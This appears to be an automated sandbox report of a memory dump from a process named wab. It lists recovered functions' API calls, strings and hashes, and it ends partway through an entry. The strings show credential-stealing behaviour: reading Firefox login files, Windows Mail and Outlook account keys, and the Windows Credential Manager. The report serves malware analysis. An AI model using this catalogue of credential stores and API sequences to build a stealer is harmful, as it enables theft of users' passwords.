                                      • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                      • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                      • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                      • API String ID: 710961058-601624466
                                      • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                      • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                      • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                      • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: sprintf$memset$_mbscpy
                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                      • API String ID: 3402215030-3842416460
                                      • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                      • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                      • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                      • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                      APIs
                                        • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                        • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                        • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                        • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                        • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                        • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                        • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                        • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                      • strlen.MSVCRT ref: 0040F139
                                      • strlen.MSVCRT ref: 0040F147
                                      • memset.MSVCRT ref: 0040F187
                                      • strlen.MSVCRT ref: 0040F196
                                      • strlen.MSVCRT ref: 0040F1A4
                                      • memset.MSVCRT ref: 0040F1EA
                                      • strlen.MSVCRT ref: 0040F1F9
                                      • strlen.MSVCRT ref: 0040F207
                                      • _strcmpi.MSVCRT ref: 0040F2B2
                                      • _mbscpy.MSVCRT ref: 0040F2CD
                                      • _mbscpy.MSVCRT ref: 0040F30E
                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                      • String ID: logins.json$none$signons.sqlite$signons.txt
                                      • API String ID: 1613542760-3138536805
                                      • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                      • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                      • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                      • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                      • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                      • API String ID: 1012775001-1343505058
                                      • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                      • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                      • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                      • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                      APIs
                                      • memset.MSVCRT ref: 00444612
                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                      • strlen.MSVCRT ref: 0044462E
                                      • memset.MSVCRT ref: 00444668
                                      • memset.MSVCRT ref: 0044467C
                                      • memset.MSVCRT ref: 00444690
                                      • memset.MSVCRT ref: 004446B6
                                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                      • memcpy.MSVCRT ref: 004446ED
                                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                        • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                      • memcpy.MSVCRT ref: 00444729
                                      • memcpy.MSVCRT ref: 0044473B
                                      • _mbscpy.MSVCRT ref: 00444812
                                      • memcpy.MSVCRT ref: 00444843
                                      • memcpy.MSVCRT ref: 00444855
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset$strlen$_mbscpy
                                      • String ID: salu
                                      • API String ID: 3691931180-4177317985
                                      • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                      • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                      • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                      • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                      APIs
                                      • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                      • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$FreeLoad
                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                      • API String ID: 2449869053-232097475
                                      • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                      • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                      • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                      • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                      APIs
                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                      • strlen.MSVCRT ref: 00443AD2
                                      • ??2@YAPAXI@Z.MSVCRT ref: 00443AE2
                                      • memset.MSVCRT ref: 00443B2E
                                      • memset.MSVCRT ref: 00443B4B
                                      • _mbscpy.MSVCRT ref: 00443B79
                                      • RegCloseKey.ADVAPI32(?), ref: 00443BBD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 00443C0E
                                      • LocalFree.KERNEL32(?), ref: 00443C23
                                      • ??3@YAXPAX@Z.MSVCRT ref: 00443C2C
                                        • Part of subcall function 0040737C: strtoul.MSVCRT ref: 00407384
                                      Strings
                                      • Salt, xrefs: 00443BA7
                                      • Software\Microsoft\Windows Mail, xrefs: 00443B61
                                      • Software\Microsoft\Windows Live Mail, xrefs: 00443B6D
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpymemset$??2@??3@AddressByteCharCloseFreeLibraryLoadLocalMultiProcWidestrlenstrtoul
                                      • String ID: Salt$Software\Microsoft\Windows Live Mail$Software\Microsoft\Windows Mail
                                      • API String ID: 665470638-2687544566
                                      • Opcode ID: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                      • Instruction ID: b5c6082ae13936646b807c1e62aeefce293f73be8e3cc3c219efd7c8c3ae97f2
                                      • Opcode Fuzzy Hash: 7cb30311ba7eed61cb83e58bd1bf389174eb1fc448745f2dd655db9f8e6608db
                                      • Instruction Fuzzy Hash: C2415276C0425CAADB11DFA5DC81EDEB7BCEB48315F1401AAE945F3142DA38EA44CB68
                                      APIs
                                      • sprintf.MSVCRT ref: 0040957B
                                      • LoadMenuA.USER32(?,?), ref: 00409589
                                        • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                        • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                        • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                        • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                      • DestroyMenu.USER32(00000000), ref: 004095A7
                                      • sprintf.MSVCRT ref: 004095EB
                                      • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                      • memset.MSVCRT ref: 0040961C
                                      • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                      • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                      • DestroyWindow.USER32(00000000), ref: 0040965C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                      • String ID: caption$dialog_%d$menu_%d
                                      • API String ID: 3259144588-3822380221
                                      • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                      • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                      • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                      • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                      APIs
                                        • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                      • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                      • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                      • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                      • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                      • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$Library$FreeLoad
                                      • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                      • API String ID: 2449869053-4258758744
                                      • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                      • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                      • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                      • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                      • memset.MSVCRT ref: 0040F84A
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                      • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                      • LocalFree.KERNEL32(?), ref: 0040F92C
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                      • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                      • String ID: Creds$ps:password
                                      • API String ID: 551151806-1872227768
                                      • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                      • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                      • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                      • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                      APIs
                                      • wcsstr.MSVCRT ref: 0040426A
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                      • _mbscpy.MSVCRT ref: 004042D5
                                      • _mbscpy.MSVCRT ref: 004042E8
                                      • strchr.MSVCRT ref: 004042F6
                                      • strlen.MSVCRT ref: 0040430A
                                      • sprintf.MSVCRT ref: 0040432B
                                      • strchr.MSVCRT ref: 0040433C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                      • String ID: %s@gmail.com$www.google.com
                                      • API String ID: 3866421160-4070641962
                                      • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                      • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                      • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                      • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                      APIs
                                      • _mbscpy.MSVCRT ref: 00409749
                                      • _mbscpy.MSVCRT ref: 00409759
                                        • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                        • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                        • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                      • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                      • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                      • _mbscpy.MSVCRT ref: 004097A1
                                      • memset.MSVCRT ref: 004097BD
                                      • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                      • String ID: TranslatorName$TranslatorURL$general$strings
                                      • API String ID: 1035899707-3647959541
                                      • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                      • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                      • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                      • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                      APIs
                                      • SetBkMode.GDI32(?,00000001), ref: 0040CAA9
                                      • SetTextColor.GDI32(?,00FF0000), ref: 0040CAB7
                                      • SelectObject.GDI32(?,?), ref: 0040CACC
                                      • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040CB01
                                      • SelectObject.GDI32(00000014,?), ref: 0040CB0D
                                        • Part of subcall function 0040C866: GetCursorPos.USER32(?), ref: 0040C873
                                        • Part of subcall function 0040C866: GetSubMenu.USER32(?,00000000), ref: 0040C881
                                        • Part of subcall function 0040C866: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C8AE
                                      • LoadCursorA.USER32(00000067), ref: 0040CB2E
                                      • SetCursor.USER32(00000000), ref: 0040CB35
                                      • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040CB57
                                      • SetFocus.USER32(?), ref: 0040CB92
                                      • SetFocus.USER32(?), ref: 0040CC0B
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                      • String ID:
                                      • API String ID: 1416211542-0
                                      • Opcode ID: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                      • Instruction ID: a165bd417b068057189d88e4de4b8a05c76419b6bed384540fbaf8c3ec59208f
                                      • Opcode Fuzzy Hash: f4c7f0c06a8cbb40d0b8ee643da8bcba5cea1f38dede712628b69917910cd439
                                      • Instruction Fuzzy Hash: BE51D371504604EFCB119FB5DCCAAAA77B5FB09301F040636FA06A72A1DB38AD41DB6D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                      • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                      • API String ID: 2360744853-2229823034
                                      • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                      • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                      • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                      • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                      APIs
                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                      • memset.MSVCRT ref: 00402C9D
                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                      • RegCloseKey.ADVAPI32(?), ref: 00402D9F
                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                      • memset.MSVCRT ref: 00402CF7
                                      • sprintf.MSVCRT ref: 00402D10
                                      • sprintf.MSVCRT ref: 00402D4E
                                        • Part of subcall function 00402BD1: memset.MSVCRT ref: 00402BF1
                                        • Part of subcall function 00402BD1: RegCloseKey.ADVAPI32 ref: 00402C55
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Closememset$sprintf$EnumOpen
                                      • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                      • API String ID: 1831126014-3814494228
                                      • Opcode ID: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                                      • Instruction ID: 079f63aacd2b880b2e0576cff081af09170d207e8fe08998d1b5f7116231a607
                                      • Opcode Fuzzy Hash: 0a74fa32d67bcbbc313bb9d475b1a51825b482d692cab0296bf401a07d6f2bf5
                                      • Instruction Fuzzy Hash: C7313072D0011DBADB11DA91CD46FEFB77CAF14345F0404A6BA18B2191E7B8AF849B64
                                      APIs
                                      • strchr.MSVCRT ref: 004100E4
                                      • _mbscpy.MSVCRT ref: 004100F2
                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                      • _mbscpy.MSVCRT ref: 00410142
                                      • _mbscat.MSVCRT ref: 0041014D
                                      • memset.MSVCRT ref: 00410129
                                        • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                        • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                      • memset.MSVCRT ref: 00410171
                                      • memcpy.MSVCRT ref: 0041018C
                                      • _mbscat.MSVCRT ref: 00410197
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                      • String ID: \systemroot
                                      • API String ID: 912701516-1821301763
                                      • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                      • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                      • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                      • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$strlen
                                      • String ID: -journal$-wal$immutable$nolock
                                      • API String ID: 2619041689-3408036318
                                      • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                      • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                      • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                      • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??3@$strlen
                                      • String ID:
                                      • API String ID: 4288758904-3916222277
                                      • Opcode ID: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                      • Instruction ID: 13b3c487e6fc4f201ff2a1b2153655c725249ac645d8b76b05149576827ff0bb
                                      • Opcode Fuzzy Hash: 0d8ca511c5072b078eb3d0a6120a778982d5313864eb540143a009a0415e1b17
                                      • Instruction Fuzzy Hash: 1F6189319093869FDB109F25948452BBBF0FB8531AF905D7FF4D2A22A2D738D845CB0A
                                      APIs
                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                      • wcslen.MSVCRT ref: 0040874A
                                      • _wcsncoll.MSVCRT ref: 00408794
                                      • memset.MSVCRT ref: 0040882A
                                      • memcpy.MSVCRT ref: 00408849
                                      • wcschr.MSVCRT ref: 0040889F
                                      • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
